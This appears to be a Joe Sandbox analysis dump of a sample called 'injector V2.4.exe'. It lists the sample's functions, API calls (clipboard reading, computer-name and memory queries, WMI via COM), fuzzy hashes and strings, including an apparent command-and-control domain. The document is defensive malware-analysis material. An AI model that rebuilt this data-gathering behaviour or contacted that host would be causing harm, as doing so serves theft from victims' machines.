Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1

Function 00B5020A Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B50212

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575

Function 00B54400 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423

Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490

___initconout.LIBCMT ref: 00B54433

Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90

Function 00B5225C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B52265

Strings

csm, xrefs: 00B522F8
csm, xrefs: 00B52287

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85

Analysis Process: injector V2.4.exePID: 1492, Parent PID: 6348COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.8%
Total number of Nodes:	245
Total number of Limit Nodes:	18

Executed Functions

Function 004394C0 Relevance: 32.1, APIs: 11, Strings: 7, Instructions: 599
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00444678,00000000,00000001,00444668,00000000), ref: 004395D3
SysAllocString.OLEAUT32(598B5B92), ref: 0043965B
CoSetProxyBlanket.COMBASE(4740E3A3,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004396A4
SysAllocString.OLEAUT32(M'U!), ref: 0043972E
SysAllocString.OLEAUT32(M'U!), ref: 004397DC
VariantInit.OLEAUT32(?), ref: 00439852

Strings

Pq4s, xrefs: 00439756
&u)w, xrefs: 0043975E
C, xrefs: 00439588
8e#g, xrefs: 0043973E
M'U!, xrefs: 004396D0
\, xrefs: 00439590
;y.{, xrefs: 00439746

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: &u)w$8e#g$;y.{$C$M'U!$Pq4s$\
API String ID: 65563702-1931860412
Opcode ID: 3131e6d7beb5a08458c71a3d03e2f04a7d785c70cb91973e330a3a6039f6e485
Instruction ID: abd9ad4aa2cd1e615a1ea83e1953b3a13448af8400c9208da3b8f5b1455d5226
Opcode Fuzzy Hash: 3131e6d7beb5a08458c71a3d03e2f04a7d785c70cb91973e330a3a6039f6e485
Instruction Fuzzy Hash: 9A220F72A083519BD710CF64C881B5BFBE4EF89714F148A2EE9959B391D3B8DC05CB86

Function 00425655 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WT, xrefs: 00425A67
45, xrefs: 00425BDE
PR, xrefs: 00425A77
])[, xrefs: 0042580E
E)C, xrefs: 004257FE
H=K3, xrefs: 00425BCE
Q)R/, xrefs: 00425BA6
J9_?, xrefs: 00425BC6
A%L;, xrefs: 00425BBE
M5M3, xrefs: 004257DE
_O, xrefs: 00425A6F
9A,_, xrefs: 00425806
\!R', xrefs: 00425BB6

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: E)C$ ])[$45$9A,_$A%L;$H=K3$J9_?$M5M3$PR$Q)R/$WT$\!R'$_O
API String ID: 0-2090315249
Opcode ID: da635d22eb937dc60354293ee85d6c86b0075b2866091f58ff47623310404c59
Instruction ID: b68f3100725fdea93f63c05b88aeb558aac358734095ca1e3ace5d0c7ebe172d
Opcode Fuzzy Hash: da635d22eb937dc60354293ee85d6c86b0075b2866091f58ff47623310404c59
Instruction Fuzzy Hash: 31F1D8B4508340DFE300DF55E89166BBBE0FF86745F40892DE4958B351EBB88A09CB8B

Function 0040CE25 Relevance: 16.6, Strings: 13, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OR, xrefs: 0040D11F
EEBA357730734AB7E838C389DB357F59, xrefs: 0040CE82
XY, xrefs: 0040D25C
~yd?, xrefs: 0040CF6C
.'&!, xrefs: 0040D1B9
)65&, xrefs: 0040CF4B
TR, xrefs: 0040D109
fumblingactor.cyou, xrefs: 0040D2C8
FT]N, xrefs: 0040CF40
NP]V, xrefs: 0040CF35
KO, xrefs: 0040D114
QRNv, xrefs: 0040CFFC
/,l=, xrefs: 0040CF56

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: )65&$.'&!$/,l=$EEBA357730734AB7E838C389DB357F59$FT]N$KO$NP]V$OR$QRNv$TR$XY$fumblingactor.cyou$~yd?
API String ID: 0-3594009850
Opcode ID: 5c0355d46384088a88c6e0859dcb1a9008e3f6abb8f8369841429697bd54f9cb
Instruction ID: daf7d03e4006aa7799bef43f755bc3c64c81d6174eb99f28977b0d5591b26dda
Opcode Fuzzy Hash: 5c0355d46384088a88c6e0859dcb1a9008e3f6abb8f8369841429697bd54f9cb
Instruction Fuzzy Hash: 4BB1F1B26483D18BD335CF65C8917EBFBE0EF92304F18992DD0D99B281DB7845098B96

Function 00434A10 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00434A52
GetSystemMetrics.USER32 ref: 00434A62

Strings

PC, xrefs: 00434C8F
4QC, xrefs: 00434BDF
^PC, xrefs: 00434BD4
iSC, xrefs: 00434C42
XQC, xrefs: 00434C4D
, xrefs: 00434B4F
@TC, xrefs: 00434C58

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: MetricsSystem
String ID: $4QC$@TC$XQC$^PC$iSC$PC
API String ID: 4116985748-250485823
Opcode ID: 3b7fd41fc91f95a93440f849e5fc468c9e9997b57805308ef3683cc16079416d
Instruction ID: d870d97c3ceafa91c7ad39a0e65d79a432a51132ae261a3294225aeb1a72472e
Opcode Fuzzy Hash: 3b7fd41fc91f95a93440f849e5fc468c9e9997b57805308ef3683cc16079416d
Instruction Fuzzy Hash: B2917FB05093808FE360DF24D55878FBBF0BB99348F50891EE5999B250D7BA9858CF47

Function 0041941E Relevance: 11.7, APIs: 1, Strings: 5, Instructions: 1219COMMON

Download Yara Rule

Strings

c_U, xrefs: 00419900
@'R!, xrefs: 00419566
MMM@, xrefs: 00419CCA
YS\T, xrefs: 00419FFC
R\Z_, xrefs: 00419CBF

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: @'R!$MMM@$R\Z_$YS\T$c_U
API String ID: 0-3488300602
Opcode ID: d1f66adfd4fcc868d937836482d338479e62927327581ddde12b0d4aa2e2a154
Instruction ID: baf20e0673599ef8593dab04091c3027504b825d34360345a5d0165da7ee39e9
Opcode Fuzzy Hash: d1f66adfd4fcc868d937836482d338479e62927327581ddde12b0d4aa2e2a154
Instruction Fuzzy Hash: 288233B55083428BD730CF24D891BABB7E1FF96304F04497EE49987392E7398946CB96

Function 0040DE2F Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00434A10: GetSystemMetrics.USER32 ref: 00434A52
Part of subcall function 00434A10: GetSystemMetrics.USER32 ref: 00434A62

CoUninitialize.COMBASE ref: 0040DE44

Strings

_], xrefs: 0040E102
V[, xrefs: 0040E123
F], xrefs: 0040E118
fumblingactor.cyou, xrefs: 0040E240

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: MetricsSystem$Uninitialize
String ID: F]$V[$_]$fumblingactor.cyou
API String ID: 1128523136-2066580127
Opcode ID: e2e69548ec65afe510a1f042ab3d4eedb3d154c47f4f9cc49bc048d15f658242
Instruction ID: 91e67c5233bfe060f6131ed90c429332b377a14934daf549c0916e1690ed0354
Opcode Fuzzy Hash: e2e69548ec65afe510a1f042ab3d4eedb3d154c47f4f9cc49bc048d15f658242
Instruction Fuzzy Hash: 0DA1DFB040C3D18AD3318F2594907EBBFE1AF96318F18896DD0DA5B382D7794506CB9A

Function 00408D80 Relevance: 7.7, APIs: 5, Instructions: 159
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408DA2
GetCurrentThreadId.KERNEL32 ref: 00408DB5
GetCurrentProcessId.KERNEL32 ref: 00408DBD
GetForegroundWindow.USER32 ref: 00408EC8
ExitProcess.KERNEL32 ref: 00408F84

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7ca63eb4d608068c3f53d204ff75812527e5826010bbffe4bc0c5a0facae7128
Instruction ID: ec84d18f692cae3cd09d24be5d72724f221820b2ed8908d3715ab92a5529b125
Opcode Fuzzy Hash: 7ca63eb4d608068c3f53d204ff75812527e5826010bbffe4bc0c5a0facae7128
Instruction Fuzzy Hash: 48412C73B483084BD314AEBA9DC635AB6D79BC8314F09C43DA9C8DB3D5ED789C058685

Function 0042E573 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042E637
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E9CD

Strings

SMKB, xrefs: 0042EC6C

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: SMKB
API String ID: 2904949787-199350193
Opcode ID: 84bb1bcb61cb764a414bf4c35f3f93cd9ffefe12dd210bfc4f3239cb5b2dad05
Instruction ID: af0b3b1f951b80ed898f8c04cb280043775681b1c66c593ae400426ccc71405f
Opcode Fuzzy Hash: 84bb1bcb61cb764a414bf4c35f3f93cd9ffefe12dd210bfc4f3239cb5b2dad05
Instruction Fuzzy Hash: 26F1A330204B918BE7368F39D4A17A3BBE1AF27304F58499DC0E78B382D779A549C765

Function 0042E986 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E9CD
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042EAB1

Strings

SMKB, xrefs: 0042EC6C

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: ComputerName
String ID: SMKB
API String ID: 3545744682-199350193
Opcode ID: c1fbc1c1cd76db13ff124be77aedb5b87d99e15673911b32ece58eeb9cc97f14
Instruction ID: 5b8b3e73ca0bc2d54b50f5b4fcd8676657c0da4bb17634c61f1f99bb84d849c1
Opcode Fuzzy Hash: c1fbc1c1cd76db13ff124be77aedb5b87d99e15673911b32ece58eeb9cc97f14
Instruction Fuzzy Hash: 83C1A230108B908AE736CF3694657F3BBE1AF27304F44499DC0EB9B282D779A549CB65

Function 0042EED9 Relevance: 1.9, APIs: 1, Instructions: 417COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F045

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: d69687e6c22ed53eebb580c7f8af350e38e40b1aa3c48f14f61b4a0bc34983c0
Instruction ID: 056d5d551f466a474ca61b598eb84f26100ca8a69ac67d6299fece4edac190fe
Opcode Fuzzy Hash: d69687e6c22ed53eebb580c7f8af350e38e40b1aa3c48f14f61b4a0bc34983c0
Instruction Fuzzy Hash: DFD15871604B408BD739CF39D490763BBE2AF96304F588A6EC0D78B786DB39A50AC754

Function 0043E480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00441142,005C003F,00000008,00000018,?), ref: 0043E4AE

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040DBCA Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

7654, xrefs: 0040DC29

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654
API String ID: 2994545307-4024152101
Opcode ID: 0ef41de9bb6edcb7bcd011eda3842dede41f6ac0de0f38ef965d24c2739b9bad
Instruction ID: c52c56b965f2fcbf7ea79454a85090f42ae9ccd1348fffa0717f8c3364df2f0c
Opcode Fuzzy Hash: 0ef41de9bb6edcb7bcd011eda3842dede41f6ac0de0f38ef965d24c2739b9bad
Instruction Fuzzy Hash: 535189B6F0526057EB24AB12AC5276F3652AFC4318F55403EE80A37283DE796D06C6DF

Function 0043802A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00438057

Strings

#, xrefs: 00438071
%, xrefs: 00438069
", xrefs: 0043806D

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: "$#$%
API String ID: 95929093-3532947016
Opcode ID: 4c893312475e4190a8d3ba915345f69893da5641c593096fdfc6d439405b31b9
Instruction ID: 6269889a9b65b3dd2f9485572c88820ee243b25ba7ed443d02dbd458bae4ad1d
Opcode Fuzzy Hash: 4c893312475e4190a8d3ba915345f69893da5641c593096fdfc6d439405b31b9
Instruction Fuzzy Hash: 78215936D043A58FDF148F74D8443FEBBB15B99310F2A80ADC99067381C97E9A898BD5

Function 0043E3D0 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043E450

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2411ea3a7a6fcdc6fb4e7061e3bb0e183c246fdc6988f9c310cc9b4b83ef534f
Instruction ID: 19542a50b7386a1c3dac37311dc98b9c7a76f3cf7a53d68946b425c3295cedba
Opcode Fuzzy Hash: 2411ea3a7a6fcdc6fb4e7061e3bb0e183c246fdc6988f9c310cc9b4b83ef534f
Instruction Fuzzy Hash: BB114C72A042128BD314DF39DC55A1BB76BEFCE301F098879D88057149DA349816C6D2

Function 0043BC40 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043BCE7

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5a92c9e023f11f389f4aaaeba5d1c2f0e62b2d9d88c9cfb5f346e52b1beceeb5
Instruction ID: b434d758bf00353734159668cec28ce173c4b33463bb7985cf1770455835634d
Opcode Fuzzy Hash: 5a92c9e023f11f389f4aaaeba5d1c2f0e62b2d9d88c9cfb5f346e52b1beceeb5
Instruction Fuzzy Hash: 1811AB33B993544BC3288EA4ACD165BFB4AD7C9324F1A413DD8845B2E1C9640C24C391

Function 0043BBC0 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00004021,?,?,?,004239A1), ref: 0043BC2B

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c0256ce51743fc08c8df6e21bcdfc83e2a5a802704955a0f06629abc2b76cd6a
Instruction ID: 93249e33f8eab1ab5a5b803966a39683f08daa8ce4e81569f3846dc08810f3a0
Opcode Fuzzy Hash: c0256ce51743fc08c8df6e21bcdfc83e2a5a802704955a0f06629abc2b76cd6a
Instruction Fuzzy Hash: F6F0C0319081608FD301C729EC2461F7AA3EBC4A24F09807CD48447354C9315801CFC2

Function 004333D4 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00433421

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: ac9982cd0f2bda9c440031b818958bc790b664b8fe6775204b8eb48106fdd4d9
Instruction ID: d1e759b4ae0efbd400adcfaa92f9f226fc8968873930e28b105e02b75b2d22e4
Opcode Fuzzy Hash: ac9982cd0f2bda9c440031b818958bc790b664b8fe6775204b8eb48106fdd4d9
Instruction Fuzzy Hash: 5BF0B2B45097428FD315DF24C5A9717BFF1FB89304F01885DE4A58B391D7B99908CB92

Function 00431F13 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00431F5C

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f7785a69041ee58e0809caf9ae336b8cdeced4e8a51149c2d12a4696e3830c09
Instruction ID: af87fca264f035a3ce3685b586e73b4fd16443edb0e392b33753fb592137f721
Opcode Fuzzy Hash: f7785a69041ee58e0809caf9ae336b8cdeced4e8a51149c2d12a4696e3830c09
Instruction Fuzzy Hash: 10F0D4B41087018FE344DF24C5A875BBBE2BB89308F11891CE0954B394C7B6A909CF82

Function 0040CDC0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CDD3

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 54f9b1cfb0f17e120d2a0d18b9ec134cecc09ecec9e3dcbcf69b035d607272ec
Instruction ID: 0bd83624564a8c5f579967c148d55abd7f42f54bfba681c3cc5c1a94088b0f27
Opcode Fuzzy Hash: 54f9b1cfb0f17e120d2a0d18b9ec134cecc09ecec9e3dcbcf69b035d607272ec
Instruction Fuzzy Hash: E7D0A7349986846BD240775CEC47F22366C9783725F400237B2A6C73D1EA506915C5A9

Function 0040CDF3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE05

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 806dbd789992583e3f5a9b353890eb80d6b43256d07365f12c610fe55a1a2e57
Instruction ID: 2e8427c41f75f6d02aabc341fab3161eb983de88cc61e617143108e86bb1691a
Opcode Fuzzy Hash: 806dbd789992583e3f5a9b353890eb80d6b43256d07365f12c610fe55a1a2e57
Instruction Fuzzy Hash: 1BD092783D83417BE1B48708AC17F1032606302B51F340664B326EE2E1CAE0A112861C

Non-executed Functions

Function 00434830 Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 138clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00434840
GetWindowLongW.USER32 ref: 0043486B
GetClipboardData.USER32 ref: 0043487B
GlobalLock.KERNEL32 ref: 00434894
GlobalUnlock.KERNEL32 ref: 004349E4
CloseClipboard.USER32 ref: 004349ED

Strings

x, xrefs: 00434919
Y, xrefs: 00434928
d, xrefs: 0043492D
f, xrefs: 00434923
!, xrefs: 0043491E
n, xrefs: 0043490A
e, xrefs: 004348FB
g, xrefs: 004348F6
k, xrefs: 00434914
i, xrefs: 00434900
y, xrefs: 0043490F
~, xrefs: 00434905

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

